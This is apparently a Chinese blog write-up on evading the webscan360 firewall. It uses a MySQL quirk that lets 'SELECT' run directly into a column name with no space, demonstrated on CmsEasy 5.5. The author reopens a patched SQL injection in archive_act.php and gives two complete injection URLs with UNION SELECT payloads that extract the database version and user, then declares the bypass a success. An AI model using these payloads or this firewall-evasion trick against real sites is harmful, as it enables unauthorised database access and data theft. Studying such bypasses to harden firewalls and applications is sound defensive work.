360导致mysql_mysql一个特性绕过webscan360导致sql完美执行

这里我们就要说一下,最新版本的cmseasy了我们首先测试一个东西,在mysql中select tname,1,2,3,4 from table 这个东西想必大家都会认同,可以执行那么我们去掉select和tname之间的空格,看看这样的语句还能否执行这里我们用cmseasy的数据库测试一下SELECTcatid FROM cmseasy_archive WHERE 1

26b88cf5e01d234a1dfd323b0f9d0f83.png

看到了没有完美执行了在之前审核cmseasy的时候第一次union select 1,2,3,4 from t 是自动会被webscan360拦截第二次union select/**/1,2,3,4 from t 这个绕过了webscan360成功执行第三次这个地方被修补了上次绕过webscan360的问题,这里我们再次测试第二次的情况会被拦截,我们不做演示了,那么我们的猜想是否正确union selecttname,1,2,3,4 from t 这个也应该会成功执行直接看代码:archive_act.php:

} elseif (front::get(front::check_type('aid'))){$this->view->archive = archive::getInstance()->getrow(front::get('aid'));

$this->view->categorys = category::getpositionlink2($this->view->archive['catid']);

$this->view->paylist = pay::getInstance()->getrows('', 50);

$this->view->logisticslist = logistics::getInstance()->getrows('', 50);

$prices = getPrices($this->view->archive['attr2']);

$this->view->archive['attr2'] = $prices['price'];

if (!is_array($this->view->archive))

$this->out('message/error.html');

if ($this->view->archive['checked'] < 1)

exit(lang('未审核!'));

if (!rank::arcget(front::get('aid'), $this->view->usergroupid)) {

$this->out('message/error.html');

}

1

2

3

4

5

6

7

8

9

10

11

12

13

}elseif(front::get(front::check_type('aid'))){$this->view->archive=archive::getInstance()->getrow(front::get('aid'));

$this->view->categorys=category::getpositionlink2($this->view->archive['catid']);

$this->view->paylist=pay::getInstance()->getrows('',50);

$this->view->logisticslist=logistics::getInstance()->getrows('',50);

$prices=getPrices($this->view->archive['attr2']);

$this->view->archive['attr2']=$prices['price'];

if(!is_array($this->view->archive))

$this->out('message/error.html');

if($this->view->archive['checked']<1)

exit(lang('未审核!'));

if(!rank::arcget(front::get('aid'),$this->view->usergroupid)){

$this->out('message/error.html');

}

这里对front::get(front::check_type('aid') 这个进行了处理,故而漏洞已经修复,我们要测是的是webscan360,所以放过这里逻辑,改为:

} elseif (true || front::get(front::check_type('aid'))){$this->view->archive = archive::getInstance()->getrow(front::get('aid'));

$this->view->categorys = category::getpositionlink2($this->view->archive['catid']);

1

2

}elseif(true||front::get(front::check_type('aid'))){$this->view->archive=archive::getInstance()->getrow(front::get('aid'));

$this->view->categorys=category::getpositionlink2($this->view->archive['catid']);

我们访问url:**.**.**.**/CmsEasy_5.5_UTF-8_20141015/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=1

ad74a354a6b648c4a498636a36d27146.png

那么我们访问url:**.**.**.**/CmsEasy_5.5_UTF-8_20141015/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECTtypeid,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=1

fd8568729d4e96f702d9174b1c5ae477.png

成功绕过!!!!!!!!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值